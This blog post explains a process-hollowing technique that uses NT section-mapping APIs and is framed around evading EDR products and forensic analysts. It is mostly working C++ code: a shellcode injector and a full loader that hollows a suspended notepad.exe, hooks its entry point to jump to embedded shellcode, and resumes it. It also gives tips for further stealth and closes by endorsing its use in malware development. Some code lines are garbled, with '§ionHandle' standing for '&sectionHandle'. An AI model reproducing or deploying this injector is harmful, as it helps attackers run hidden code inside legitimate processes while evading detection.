Process Hollowing? not really

Table of Content⌗
Introduction⌗
Process hollowing is a code injection / evasion technique that is often used in malware.
Process hollowing technique works by hollowing out a legitimate process image and replacing it with malicous code.
A malware that uses process hollowing starts a target ** process with CREATE_SUSPENDED flag enabled. Then using the handler it got from created the process, it hollows out the legitimate executable image from the target process’s memory.
The problem⌗
However, malware tends to use the same set of APIs for this task. Some of these APIs are,
- CreateProcessA
- WriteProcessMemory
- VirtualProtect
- VirtualAlloc
And it is very well known that these APIs are often monitored by defense solutions.
The other major disadvantage is that, when using above APIs for code injection, malware leaves a lot of memory artifacts which makes it easy for forensic analysts to indetify the parasite.
For example, in order to do a code injection in windows environment, first one
must allocate enough memory in the target process for the parasite. This alone is
not enough because those alocated memory regions should have executable
(X)
permission. Those regions should also be writable
because, otherwise,
WriteProcessMemory
or any other API that writes to another process’s memory
won’t simply work.
Therefore, Having both executable
and writable
permissions for a memory region
is a strong indication of an infection.
The solution⌗
Well, there are solutions for the 1st problem. For example, one can directly invoke syscalls without going through kernel32.dll.
Of course that’s good solution but it wont solve the second issue.
Basics⌗
Userland defense solutions mostly operate by hooking common API calls and monitoring them for malicious content. These common APIs include the ones that malware often uses for various injection techniques. to name a few,
- OpenProcess / CreateProcess
- VirtualAlloc
- VirtualProtect
- WriteProcessMemory
In past, malware authors extensively used VirtualAlloc
to inject malicous
code in to a target process. They acheived this buy allocating a memory chunk
of RWX permissions, which in fact, became a well know indication of code
injection (Memory artifact).
As a solution to this, malware authors used a combination of VirtualAlloc and VirtualProtect to inject code into a remote process. First, malware allocates a memory chunk in the remote process with RW permissions using VirtualAlloc, then it change the permission to RX using VirtualProtect.
Although this seem like a victory (since it gets rid off RWX sections), defense solutions began hooking these two calls.
Then malware authors came up with another technique, which uses two APIs from NTAPI. (well, then defense solutions hooked ntdll but as I previously mentioned, that’s out of scope of this blog post)
In order to understand the technique, one must understand how following functions from NTAPIs work.
- NtCreateSection
- NtMapViewOfSection
- ZwUnmapViewOfSection
- NtSetContextThread
For that purpose, we are going to write a small shellcode injector using some of above functions.
#include <iostream>
#include <Windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll")
unsigned char buf[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89"
"\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67"
"\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3"
"\x68\x6b\x74\x58\x20\x68\x74\x20\x72\x65\x68\x45\x3d\x67\x65"
"\x68\x54\x49\x54\x4c\x68\x72\x65\x6b\x74\x68\x67\x65\x74\x20"
"\x31\xc9\x88\x4c\x24\x16\x89\xe1\x31\xd2\x52\x53\x51\x52\xff"
"\xd0\x31\xc0\x50\xff\x55\x08";
int main(int argc, char *argv[])
{
if (argc == 2)
{
LARGE_INTEGER sectionSize = { sizeof buf };
HANDLE sectionHandle = NULL;
PVOID localSectionAddress = NULL, remoteSectionAddress = NULL;
// create a read write execute memory region in the local process
if (fNtCreateSection(
§ionHandle,
SECTION_ALL_ACCESS,
NULL,
(PLARGE_INTEGER)§ionSize,
PAGE_EXECUTE_READWRITE,
SEC_COMMIT, NULL) != STATUS_SUCCESS)
{
std::cout << "[x]Create section failed\n";
return 0;
}
SIZE_T size = sizeof buf;
// create a view of the memory section in the local process
if (fNtMapViewOfSection(
sectionHandle,
GetCurrentProcess(),
&localSectionAddress,
NULL, NULL, NULL,
&size, 2, NULL,
PAGE_READWRITE) != STATUS_SUCCESS)
{
std::cout << "[x]Create map failed\n";
return 0;
}
HANDLE processHandle = OpenProcess(
PROCESS_ALL_ACCESS,
FALSE,
DWORD(atoi(argv[1])));
if (processHandle == NULL)
{
std::cout << "[x] Open process failed\n";
return 0;
}
// create a map view of the section in the target process
if (fNtMapViewOfSection(
sectionHandle,
processHandle,
&remoteSectionAddress,
NULL, NULL, NULL,
&size, 2, NULL,
PAGE_EXECUTE_READ) != STATUS_SUCCESS)
{
std::cout << "[x]Create map failed\n";
return 0;
}
std::cout << "remote section created" << std::endl;
memcpy(localSectionAddress, buf, sizeof(buf));
std::cout << "Shellcode injected at 0x" << std::hex << remoteSectionAddress << std::endl;
CloseHandle(sectionHandle);
HANDLE targetThreadHandle = NULL;
fRtlCreateUserThread(
processHandle,
NULL,
FALSE, 0, 0, 0,
remoteSectionAddress,
NULL,
&targetThreadHandle, NULL
);
}
else
{
std::cout << "./whatever.exe <pid>" << std::endl;
}
}
NtCreateSection
function creates a shared section of memory that two or
more processes can read from and write into. The function expects ** address of an uninitalized section handle. This section handle is initialized
by the function and will be used when referencing to that specific section
NtMapViewOfSection
is the function that uses initliazed section handle
return as the output parameter of NtCreateSection. The function creates
a mapping of the section referenced with section handle in the process
user specifies.
In the above snippet, NtCreateSection
is used to createe a section with
permissions PAGE_EXECUTE_READWRITE
of size sizeof buf
.
then two calls to NtMapViewOfSection
are used to map the section into
local process and the remote process. Permissions for the mapping of
local process is PAGE_READWRITE
while permissions for the remote
process ’s mapping is PAGE_EXECUTE_READ
.
This clearly shows the advantage of NtCreateSection + NtMapViewOfSection
over many other process injection techniques. Since memory is allocated
in the target process with permissions of PAGE_EXECUTE_READ
, calls to
VirtualAlloc
wont be required. This also helps against some EDR
solutions
shellcode started crashing).
here’s the result.
mapped section in remote process
Now the APIs are understood, it is time to demonstrate the process hollowing technique using above code injection technique.
Implementation⌗
Before implementing it is essential to undersand what can be done and what we are going to do with the above injection technique.
Since this post is about process hollowing, anyone can guess we are going to hollow out the target process image and inject a shellcode using the above technique, but simply put, no.
The steps can be briefly described as follow.
- Injecting the shellcode into target process
- Retrieve ImageBaseAddress of the executable image
- Read executable image of the remote process into a buffer
- Unmap executable image from the process
- Hook somewhere of the copied image so it will jump to shellcode
- Remap the section into the remote process using above techniques
Here is the PoC code.
#include <iostream>
#include <Windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll")
#define SECTION_SIZE 0x1000
typedef struct {
HRSRC shellcodeResource;
SIZE_T shellcodeSize;
BYTE* shellcode;
} SHELLCODE;
typedef struct {
HANDLE processHandle;
DWORD imageBaseAddress;
DWORD entryPoint;
} HOST;
#if !defined NTSTATUS
typedef LONG NTSTATUS;
#endif
#define STATUS_SUCCESS 0
typedef CLIENT_ID* PCLIENT_ID;
using myNtCreateSection = NTSTATUS(NTAPI*)(
OUT PHANDLE SectionHandle,
IN ULONG DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PLARGE_INTEGER MaximumSize OPTIONAL,
IN ULONG PageAttributess,
IN ULONG SectionAttributes,
IN HANDLE FileHandle OPTIONAL
);
using myNtMapViewOfSection = NTSTATUS(NTAPI*)(
HANDLE SectionHandle,
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG_PTR ZeroBits,
SIZE_T CommitSize,
PLARGE_INTEGER SectionOffset,
PSIZE_T ViewSize,
DWORD InheritDisposition,
ULONG AllocationType,
ULONG Win32Protect
);
using myZwUnmapViewOfSection = NTSTATUS(NTAPI*)(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress
);
using myNtGetContextThread = NTSTATUS(NTAPI*) (
IN HANDLE ThreadHandle,
OUT PCONTEXT Context
);
using myNtSetContextThread = NTSTATUS(NTAPI*) (
IN HANDLE ThreadHandle,
IN PCONTEXT Context
);
myNtCreateSection fNtCreateSection = (myNtCreateSection)(GetProcAddress(
GetModuleHandleA("ntdll"),
"NtCreateSection"));
myNtMapViewOfSection fNtMapViewOfSection = (myNtMapViewOfSection)(GetProcAddress(
GetModuleHandleA("ntdll"),
"NtMapViewOfSection"));
myZwUnmapViewOfSection fZwUnmapViewOfSection = (myZwUnmapViewOfSection)(GetProcAddress(
GetModuleHandleA("ntdll"),
"ZwUnmapViewOfSection"));
myNtGetContextThread fNtGetContextThread = (myNtGetContextThread)(GetProcAddress(
GetModuleHandleA("ntdll"),
"NtGetContextThread"));
myNtSetContextThread fNtSetContextThread = (myNtSetContextThread)(GetProcAddress(
GetModuleHandleA("ntdll"),
"NtSetContextThread"));
DWORD GetSizeOfImage(BYTE* processImage)
{
IMAGE_DOS_HEADER* dosHeader = NULL;
IMAGE_NT_HEADERS* ntHeaders = NULL;
dosHeader = (IMAGE_DOS_HEADER*)processImage;
ntHeaders = (IMAGE_NT_HEADERS*)((BYTE*)processImage + dosHeader->e_lfanew);
return ntHeaders->OptionalHeader.SizeOfImage;
}
DWORD GetEntryPoint(BYTE* processImage)
{
IMAGE_DOS_HEADER* dosHeader = NULL;
IMAGE_NT_HEADERS* ntHeaders = NULL;
dosHeader = (IMAGE_DOS_HEADER*)processImage;
ntHeaders = (IMAGE_NT_HEADERS*)((BYTE*)processImage + dosHeader->e_lfanew);
return (ntHeaders->OptionalHeader.AddressOfEntryPoint);
}
PVOID PatchHostProcess(HOST* hostProcess, PVOID shellcodeAddress)
{
// read enough bytes to get the size of image
SIZE_T bytesRead = 0;
BYTE* imageData = new(BYTE[SECTION_SIZE]);
// both calls read the same chunk of same size because this readprocessmemory fails we change the size
if (!ReadProcessMemory(
hostProcess->processHandle,
(LPCVOID)hostProcess->imageBaseAddress,
imageData,
SECTION_SIZE,
&bytesRead) && bytesRead != SECTION_SIZE)
{
std::cout << "[!] failed to read process image headers" << std::endl;
return NULL;
}
DWORD sizeOfImage = GetSizeOfImage(imageData);
delete[] imageData;
BYTE* processImage = new(BYTE[sizeOfImage]);
if (!ReadProcessMemory(
hostProcess->processHandle,
(LPCVOID)hostProcess->imageBaseAddress,
processImage,
sizeOfImage,
&bytesRead) && bytesRead != sizeOfImage)
{
std::cout << "[!] failed to read process image" << std::endl;
return NULL;
}
DWORD entryPoint = GetEntryPoint(processImage);
std::cout << "[!]Original entry point : 0x" << std::hex << hostProcess->imageBaseAddress + entryPoint << std::endl;
memset(processImage + entryPoint, 0x90, 5);
DWORD processEntry = hostProcess->imageBaseAddress + entryPoint;
DWORD relativeAddr = (((DWORD)shellcodeAddress - processEntry) - 5);
*((BYTE*)processImage + entryPoint) = 0xe9; // jmp
*(uintptr_t*)((uintptr_t)processImage + entryPoint + 1) = relativeAddr; // address
LARGE_INTEGER sectionSize = { sizeOfImage };
HANDLE sectionHandle = NULL;
PVOID sectionAddress = NULL;
if (fNtCreateSection(
§ionHandle,
SECTION_ALL_ACCESS,
NULL,
(PLARGE_INTEGER)§ionSize,
PAGE_EXECUTE_READWRITE,
SEC_COMMIT, NULL) != STATUS_SUCCESS)
{
std::cout << "[!] create section failed" << std::endl;
return NULL;
}
if (fNtMapViewOfSection(
sectionHandle,
GetCurrentProcess(),
§ionAddress,
NULL, NULL, NULL,
&bytesRead, 2, NULL,
PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
{
std::cout << "[!] create section failed" << std::endl;
return NULL;
}
std::cout << "[!]replacing patched process image at 0x" << std::hex << hostProcess->imageBaseAddress << std::endl;
memcpy(sectionAddress, processImage, sizeOfImage);
sectionAddress = (PVOID)hostProcess->imageBaseAddress;
if (fZwUnmapViewOfSection(
hostProcess->processHandle,
sectionAddress) != STATUS_SUCCESS)
{
std::cout << "[!] unmapping failed" << std::endl;
return NULL;
}
if (fNtMapViewOfSection(
sectionHandle,
hostProcess->processHandle,
§ionAddress,
NULL, NULL, NULL,
&bytesRead,
2, NULL,
PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
{
std::cout << "create section failed" << std::endl;
return NULL;
}
CloseHandle(sectionHandle);
delete[] processImage;
return (PVOID)processEntry;
}
PVOID InjectShellcode(HOST* hostProcess, SHELLCODE* s)
{
LARGE_INTEGER sectionSize = { s->shellcodeSize };
HANDLE sectionHandle = NULL;
PVOID localSectionAddress = NULL, remoteSectionAddress = NULL;
// create a read write execute memory region in the local process
if (fNtCreateSection(
§ionHandle,
SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE,
NULL,
(PLARGE_INTEGER)§ionSize,
PAGE_EXECUTE_READWRITE,
SEC_COMMIT,
NULL) != STATUS_SUCCESS)
{
std::cout << "[x]Create section failed\n";
return NULL;
}
// create a view of the memory section in the local process
if (fNtMapViewOfSection(
sectionHandle,
GetCurrentProcess(),
&localSectionAddress,
NULL, NULL, NULL,
&s->shellcodeSize,
2, NULL,
PAGE_READWRITE) != STATUS_SUCCESS)
{
std::cout << "[x]Create map failed\n";
return NULL;
}
// create a map view of the section in the target process
if (fNtMapViewOfSection(
sectionHandle,
hostProcess->processHandle,
&remoteSectionAddress,
NULL, NULL, NULL,
&s->shellcodeSize,
2, NULL,
PAGE_EXECUTE_READ) != STATUS_SUCCESS)
{
std::cout << "[x]Create map failed\n";
return NULL;
}
memcpy(localSectionAddress, s->shellcode, s->shellcodeSize);
std::cout << "[!]Shellcode injected to 0x" << std::hex << (DWORD)remoteSectionAddress << std::endl;
CloseHandle(sectionHandle);
return remoteSectionAddress;
}
int main(void)
{
unsigned char buf[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89"
"\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67"
"\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3"
"\x68\x6b\x74\x58\x20\x68\x74\x20\x72\x65\x68\x45\x3d\x67\x65"
"\x68\x54\x49\x54\x4c\x68\x72\x65\x6b\x74\x68\x67\x65\x74\x20"
"\x31\xc9\x88\x4c\x24\x16\x89\xe1\x31\xd2\x52\x53\x51\x52\xff"
"\xd0\x31\xc0\x50\xff\x55\x08";
HOST* hostProcess = new HOST();
LPSTARTUPINFOA si = new STARTUPINFOA();
LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
PROCESS_BASIC_INFORMATION* pbi = new PROCESS_BASIC_INFORMATION();
DWORD returnLength = 0;
CONTEXT ctx;
SHELLCODE* s = new SHELLCODE();
s->shellcode = buf;
s->shellcodeSize = sizeof(buf);
if (CreateProcessA(
"C:\\Windows\\System32\\notepad.exe",
(LPSTR)"C:\\Windows\\System32\\notepad.exe",
NULL, NULL, TRUE,
CREATE_SUSPENDED | CREATE_NO_WINDOW,
NULL, NULL, si, pi) == FALSE)
{
std::cout << "[x]Failed to execute notepad.exe\n";
return FALSE;
}
std::cout << "[!]Executed notepad.exe\n";
hostProcess->processHandle = pi->hProcess;
ctx.ContextFlags = CONTEXT_FULL;
fNtGetContextThread(pi->hThread, &ctx);
NtQueryInformationProcess(
hostProcess->processHandle,
ProcessBasicInformation,
pbi,
sizeof(PROCESS_BASIC_INFORMATION),
&returnLength);
DWORD pebImageBaseOffset = (DWORD)pbi->PebBaseAddress + 0x8;
SIZE_T bytesRead = 0;
if (!ReadProcessMemory(
hostProcess->processHandle,
(LPCVOID)pebImageBaseOffset,
&hostProcess->imageBaseAddress,
4, &bytesRead) && bytesRead != 4)
{
std::cout << "failed to read image base address" << std::endl;
return -1;
}
PVOID remoteShellcodeAddress = InjectShellcode(hostProcess, s);
if (remoteShellcodeAddress == NULL)
{
std::cout << "shellcode injection failed\n";
return -1;
}
PVOID addr = NULL;
if ((addr = PatchHostProcess(hostProcess, remoteShellcodeAddress)) == NULL)
{
std::cout << "failed tp patch host\n";
return -1;
}
fNtSetContextThread(pi->hThread, &ctx);
std::cout << "[!] Resumed thread\n";
ResumeThread(pi->hThread);
}
Above code does exactly what is listed above. First, it starts a notepad process suspend it’s exution. then it retrieves thread context from theprocess. Thread context is important because, without setting context back to what it was before suspending will cause a program crash.
Then it proceed to retrieve ImageBaseAddress of the process using
NtQueryInformationProcess
and ReadProcessMemory
.
Then the shellcode is injected into the target process by the function InjectShellcode. This function uses the same technique discussed arlier.
The main function then calls PatchHostProcess. This function reads the
host process’s image into the memory and parses the entry point. Then in
the local copy, it creates a hook that jumps into the shellcode that
InjectShellcode injected. Then it uses the above code injection method
and creates a section in the local process, however, before creating a
section in the remote process, it unmaps the process image using a call to
ZwUnmapViewOfSection
. it then creates the section at the same address
that the original image was mapped.
Its worth noting that it is possible to hook any address of the process image as long as it does not spawn notepad (or whatever).
Result after compiling and running the code
permissions of the shellcode
permissions of the original notepad image
Achieving more stealth⌗
Even though the technique is capable of fooling both analysts and some EDR,it can be stll detected if defense solutions are monitoring
CreateProcessA
.
There are many workarounds for this. One can directly call
NtCreateUserProcess
or NtCreateProcessEx
.
Another method is to Hook one of those APIs and call CreateProcessA
with
false arguments. For
example,
- Hook `NtCreateUserProcess` so it will jump into a specified location
- Call CreateProcessA without `CREATE_SUSPENDED` flag.
- Set `CREATE_SUSPENDED` flag and jump back to `NtCreateUserProcess`
(to learn more about above technique, my seggestion is to reverse IcedID)
The other thing to consider is changing the memory permissions of the target process after remapping. Even without doing that, it can mislead an analyst to beleive it as the malicious binary since it has permissions RWX.
Even after that, once analyst has dumped the original executable image thinking it is malicous to analyze it, it is pretty easy to indeify the hook. As stated earlier, it is possible hook any other location as long as it does not start the original process.
It is also possible to implement other instructions to change the control
flow. For example, push / ret
.
References⌗
DETECTING DECEPTIVE PROCESS HOLLOWING TECHNIQUES USING HOLLOWFIND VOLATILITY PLUGIN
The end⌗
This blog post explored the concept of section mapping and how it can be leveraged when developing malware.
#Spread Anarchy!